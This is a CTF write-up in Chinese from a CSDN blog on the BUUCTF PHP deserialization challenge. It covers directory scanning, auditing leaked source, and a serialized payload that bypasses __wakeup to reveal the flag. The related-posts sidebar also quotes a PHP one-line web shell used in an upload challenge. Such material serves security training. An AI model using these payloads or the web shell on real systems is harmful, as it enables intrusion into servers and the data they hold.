反序列化-极客大挑战2019php【I have a cat!】

于 2024-07-24 20:05:06 发布
阅读量257 收藏
点赞数 3
分类专栏: web安全 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoYeZhu_1314/article/details/140671828
版权

知道这个题考的是反序列化,那么我们第一反应该拿到他的源码。

根据这句话判断【因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯 不愧是我!!! 】说明有目录

我们直接使用dir开扫,发现有压缩文件【发现是429是因为访问人数过多寄掉了,从新开一个就好了】

 python dirsearch.py -u http://7d464724-7bc7-4ea0-af57-391cb28fedd1.node5.buuoj.cn:81/ -e .txt,php,html,json

那我们直接访问这个,并下载,说不定就是源码呢?

解压发现它里面有index.php、class.php,进去查看一下【flag试过了,不对】

 index.php
 ​
 <!DOCTYPE html>
 <head>
   <meta charset="UTF-8">
   <title>I have a cat!</title>
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
       <link rel="stylesheet" href="style.css">
 </head>
 <style>
     #login{   
         position: absolute;   
         top: 50%;   
         left:50%;   
         margin: -150px 0 0 -150px;   
         width: 300px;   
         height: 300px;   
     }   
     h4{   
         font-size: 2em;   
         margin: 0.67em 0;   
     }
 </style>
 <body>
 class.php
 ​
 <?php
 include 'flag.php';
 ​
 ​
 error_reporting(0);
 ​
 ​
 class Name{
     private $username = 'nonono';
     private $password = 'yesyes';
 ​
     public function __construct($username,$password){
         $this->username = $username;
         $this->password = $password;
     }
 ​
     function __wakeup(){
         $this->username = 'guest';
     }
 ​
     function __destruct(){
         if ($this->password != 100) {
             echo "</br>NO!!!hacker!!!</br>";
             echo "You name is: ";
             echo $this->username;echo "</br>";
             echo "You password is: ";
             echo $this->password;echo "</br>";
             die();
         }
         if ($this->username === 'admin') {
             global $flag;
             echo $flag;
         }else{
             echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
             die();
 ​
             
         }
     }
 }
 ?>

分析:index里面没有太大的信息,class里面【直接丢进chat gtp】得到了flag的关键信息

 类 Name 的关键部分
 __wakeup() :当对象从序列化字符串中恢复时调用,它会将$username的值重置为'guest'。
 __destruct() :当对象被销毁时调用。它首先检查$password是否不等于100,如果不是,则输出当前的用户名和密码。如果$username是'admin',则输出全局变量$flag的值。
 总结:获得flag需绕过__wakeup,并且满足password=100,username==='admin'

接下来我们进行构造

 <?php
 class Name{
     private $username ='admin';
     private $password = '100';
 }
 $select =new Name();
 $res = serialize($select);
 echo $res;
 //echo urlencode($res);
 

运行结果:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
把空格【就是那个方格子】替换为%00
 

在这里当修改的属性(变量)数大于实际的个数时,就可以绕过 wakeup了【其实就是将2改为3,绕过__wakeup()而已】
 

 O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
 最后这一步要编译一哈
 ?select=O%3A4%3A"Name"%3A3%3A{s%3A14%3A"%00Name%00username"%3Bs%3A5%3A"admin"%3Bs%3A14%3A"%00Name%00password"%3Bs%3A3%3A"100"%3B}
 


 

 flag{b0b9ceb2-4aac-4714-821c-1b4554d0acd1}
 


                

        

        

    




    

      

        

            

              
                
                  小野猪都有白菜拱
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    3
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
ShiroExp-1.3.1-all.jar shiro序列检测工具 

				
			

			

				

					01-12
				

			

		

		

			
				
ShiroExp-1.3.1-all.jar shiro序列检测工具  我这里是用于搭建攻防演练演示环境用

			
		

	



                

              
                



	

		

			

				
					
php json与xml序列/序列

				
			

			

				

					10-26
				

			

		

		

			
				
在Web开发中,数据交换和存储常常涉及到对象的序列序列PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...

			
		

	



                


  
              

                


	

		

			

				
					
BUUCTF-挑战2019

				
			

			

				

					Atkx's Blog
				

				

					01-27
					
					661
					
				

			

		

		

			
				
[挑战2019]Http
[挑战2019]upload
将里面的内容改为一句话木马
GIF89a
<script language="php">eval($_POST['shell']);</script> 

/upload/test.phtml

[挑战2019]PHP
访问靶机地址

提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag

查看一下index.php,发现要用get方式提交参数select

再查看class.php

			
		

	





	

		

			

				
					
BUUCTF WEB [挑战 2019]PHP

				
			

			

				

					Y1da的博客
				

				

					04-16
					
					976
					
				

			

		

		

			
				
BUUCTF WEB [挑战 2019]PHP



题目提示网站存在备份,使用御剑扫描目录,发现备份文件
http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip



下载后解压,得到index.php、class.php、flag.php等文件。


index.php(部分代码)
<?php
include 'class.php';
$select = $_GET['select'];
$res=unser

			
		

	



		

			
		



	

		

			

				
					
buu web:[挑战 2019]PHP(源码泄漏+序列

				
			

			

				

					m0_55378150的博客
				

				

					04-18
					
					2246
					
				

			

		

		

			
				
打开靶场



提到了网站备份,说明可能存在源码泄漏,御剑或者dirsearch扫一下目录,扫出来一个www.zip

下载完打开看一看



直接看到了flag.php,继续打开



这玩意一看就是假的,还是老老实实的代码审计吧

先看index.php


<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link re..

			
		

	





	

		

			

				
					
[挑战 2019]PHP 1

				
			

			

				

					qq_43618536的博客
				

				

					07-02
					
					466
					
				

			

		

		

			
				
BUUCTF的[挑战 2019]PHP 1  序列

			
		

	





	

		

			

				
					
PHP多种序列/序列的方法详解

				
			

			

				

					10-19
				

			

		

		

			
				
- `serialize` 和 `unserialize` 是PHP中基础且常用的序列序列工具,适用于大部分情况。 - `json_encode` 和 `json_decode` 提供了更紧凑、更易读的序列格式,且跨语言兼容性好。 - `var_export` 和 `eval...

			
		

	





	

		

			

				
					
64-64.渗透测试-PHP序列序列.mp4

				
			

			

				

					05-10
				

			

		

		

			
				
64-64.渗透测试-PHP序列序列.mp4

			
		

	





	

		

			

				
					
PHP常见的序列序列操作实例分析

				
			

			

				

					10-16
				

			

		

		

			
				
PHP编程中,序列序列是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...

			
		

	





	

		

			

				
					
【202309】毕马威-中国第六届领先汽车科技50_109页.pdf

				
			

			

				

					07-28
				

			

		

		

			
				
【202309】毕马威-中国第六届领先汽车科技50_109页.pdf

			
		

	





	

		

			

				
					
毕业设计—流媒体视频直播服务器-可执行内含文档代码-可执行内含文档代码.zip

				
			

			

				

					07-28
				

			

		

		

			
				
毕业设计—流媒体视频直播服务器-可执行内含文档代码-可执行内含文档代码.zip

			
		

	





	

		

			

				
					
【202206】中国汽车潮流观察报告-汽车之家研究院_54页.pdf

				
			

			

				

					07-28
				

			

		

		

			
				
【202206】中国汽车潮流观察报告-汽车之家研究院_54页.pdf

			
		

	





	

		

			

				
					
tour-project【程序员VIP专用】.zip

				
			

			

				

					07-28
				

			

		

		

			
				
【项目简介】
HTML5+CSS实现雪花旅行社


			
		

	





	

		

			

				
					
基于Springboot和Vue的物品租赁系统源码 物品租赁系统代码(高分毕设项目)

				
			

			

				

					07-28
				

			

		

		

			
				
物品租赁系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!

系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!

系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!



			
		

	





	

		

			

				
					
物联网设备的哨兵:异常行为检测实现策略

				
			

			

				

					07-28
				

			

		

		

			
				
物联网开发(IoT Development)是指开发和设计用于物联网(Internet of Things)的系统、设备和服务的过程。物联网是一个由物理设备、车辆、家用电器以及其他物品组成的网络,它们内嵌了传感器、软件和连接性,能够收集和交换数据。这些设备通过互联网相互连接,实现智能操作和远程监控。

物联网开发通常涉及以下几个方面:
1. **硬件开发**:设计和制造能够收集数据的传感器和设备。
2. **软件编程**:编写控制设备行为的软件代码,包括嵌入式系统编程和移动应用开发。
3. **网络通信**:确保设备能够通过Wi-Fi、蓝牙、ZigBee、LoRa等无线技术进行数据传输。
4. **数据管理**:开发用于存储、处理和分析收集到的数据的系统。
5. **用户界面设计**:创建用户友好的界面,使用户能够与物联网设备进行交互。
6. **安全性**:确保设备和数据传输的安全性,防止黑攻击和数据泄露。
7. **系统集成**:将不同的物联网设备和系统整合到一起,实现协同工作。

物联网开发是一个跨学科领域,需要电子工程、计算机科学、网络技术、数据分析和用户体验设计等多方面的

			
		

	





	

		

			

				
					
组播完整案例ensp介绍

				
			

			

				

					07-28
				

			

		

		

			
				
组播完整案例ensp介绍

			
		

	





	

		

			

				
					
虎克对战平台源码(Delphi+VC实例)

					
最新发布

				
			

			

				

					07-28
				

			

		

		

			
				
NetHook API 对战平台内核库是一套实现时下流行的网络对战平台(如浩方、VS)同样功能的通用内核库,运行效率高,使用为简单。内核库提供了标准的C语言API接口, 可以被VC, Delphi, VB, C# 等开发环境轻松调用。(注意:内核库仅供开发人员使用,普通用户请用校园版)。

虎克对战平台校园版是基于NetHOOK API开发的一套非常简洁、高效的免费对战平台,包含户端和服务器,并且户端是开源项目,大家可以使用此平台轻松搭建属于自己的对战平台。

NetEngineDLL.dll是基于Window完成端口模型设计的TCPServer和UDPSever通用模块,简单,高效,稳定,任何编程语言都可以调用。虎克对战校园版服务端基于此模块开发,并发数可以达到6w+,任何人都可以免费使用。

NetHook API 对战平台内核库目前为免费版本

			
		

	





	

		

			

				
					
考勤表人事考勤记录表.xlsx

				
			

			

				

					07-28
				

			

		

		

			
				
考勤表,Excel模版



			
		

	





	

		

			

				
					
buuctf 挑战2019php

				
			

			

				

					08-24
				

			

		

		

			
				
buuctf 挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列序列、变量值的展示等。序列是指将对象转为字符串的过程,而序列则是将字符串转为对象的过程。在PHP中,可以使用serialize()函数进行序列,并使用var_dump()函数进行序列结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* [阿里云IoT创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
-  *2* *3* [【BUUCTF-Web】 [挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
小野猪都有白菜拱

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值